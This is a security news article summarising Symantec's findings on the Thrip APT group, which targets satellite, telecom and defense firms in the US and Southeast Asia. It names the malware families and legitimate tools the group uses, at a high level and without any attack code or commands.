Breaking News

China-linked Thrip APT group target defense and satellite firms

Symantec tracked a new APT group named Thrip that targeted0 satellite operators, telco companies and defense contractors in the US and Southeast Asia.

Chinese APT groups are always very active, experts at Symantec have tracked a new APT group named Thrip that has breached the systems of satellite operators, telecommunications companies and defense contractors in the United States and Southeast Asia.

The Thrip group has been active since 2013, but this is the first time Symantec publicly shared details of its activities.

“We’ve been monitoring Thrip since 2013 when we uncovered a spying campaign being orchestrated from systems based in China. Since our initial discovery, the group has changed its tactics and broadened the range of tools it used. Initially, it relied heavily on custom malware, but in this most recent wave of attacks, which began in 2017, the group has switched to a mixture of custom malware and living off the land tools. ” reads the analysis published by Symantec.

Thrip APT used a combination of custom malware and legitimate tools in its attacks, the list of victims is long and include a satellite communications operator.

The hackers targeted devices involved in operations and infected computers running software that monitors and controls satellites, this circumstance suggests the attackers may also interested in sabotage.

Another victim of the group is a company specializing in geospatial imaging and mapping.

“[Thrip] targeted computers running MapXtreme GIS (Geographic Information System) software which is used for tasks such as developing custom geospatial applications or integrating location-based data into other applications. It also targeted machines running Google Earth Server and Garmin imaging software.” continues the analysis.

“The satellite operator wasn’t the only communications target Thrip was interested in. The group had also targeted three different telecoms operators, all based in Southeast Asia.”

The group also targeted three telecoms firms in Southeast Asia and a defense contractor.

The arsenal of the group includes the data stealer Trojan.Rikamanu and its evolution Infostealer.Catchamas that implements more sophisticated data strealing features and evasion capabilities.

The APT group also used the Trojan.Mycicil, a keylogger that is available for sale on Chinese underground marketplaces, and the Backdoor.Spedear and Trojan.Syndicasec malware.

The Thrip APT also many legitimate tools, including the Windows SysInternals utility PSExec, PowerShell, Mimikatz, and the LogMeIn remote access software.

Further details, including IoCs are reported in the analysis published by Symantec.

[adrotate banner=”9″] [adrotate banner=”12″]

Pierluigi Paganini

(Security Affairs – Thrip APT, cyberespionage)

[adrotate banner=”5″]

[adrotate banner=”13″]

Pierluigi Paganini

Pierluigi Paganini is member of the ENISA (European Union Agency for Network and Information Security) Threat Landscape Stakeholder Group and Cyber G7 Group, he is also a Security Evangelist, Security Analyst and Freelance Writer. Editor-in-Chief at "Cyber Defense Magazine", Pierluigi is a cyber security expert with over 20 years experience in the field, he is Certified Ethical Hacker at EC Council in London. The passion for writing and a strong belief that security is founded on sharing and awareness led Pierluigi to find the security blog "Security Affairs" recently named a Top National Security Resource for US. Pierluigi is a member of the "The Hacker News" team and he is a writer for some major publications in the field such as Cyber War Zone, ICTTF, Infosec Island, Infosec Institute, The Hacker News Magazine and for many other Security magazines. Author of the Books "The Deep Dark Web" and “Digital Virtual Currency and Bitcoin”.

Recent Posts

MediSecure data breach impacted 12.9 million individuals

Personal and health information of 12.9 million individuals was exposed in a ransomware attack on…

1 hour ago

CrowdStrike update epic fail crashed Windows systems worldwide

Windows machines worldwide displayed BSoD screen following a faulty update pushed out by cybersecurity firm…

7 hours ago

Cisco fixed a critical flaw in Security Email Gateway that could allow attackers to add root users

Cisco has addressed a critical vulnerability that could allow attackers to add new root users…

13 hours ago

SAPwned flaws in SAP AI core could expose customers’ data

Researchers discovered security flaws in SAP AI Core cloud-based platform that could expose customers' data. Cybersecurity researchers…

1 day ago

Cybercrime group FIN7 advertises new EDR bypass tool on hacking forums

The cybercrime group FIN7 is advertising a security evasion tool in multiple underground forums, cybersecurity…

1 day ago

How to Protect Privacy and Build Secure AI Products

AI systems are transforming technology and driving innovation across industries. How to protect privacy and…

2 days ago

This website uses cookies.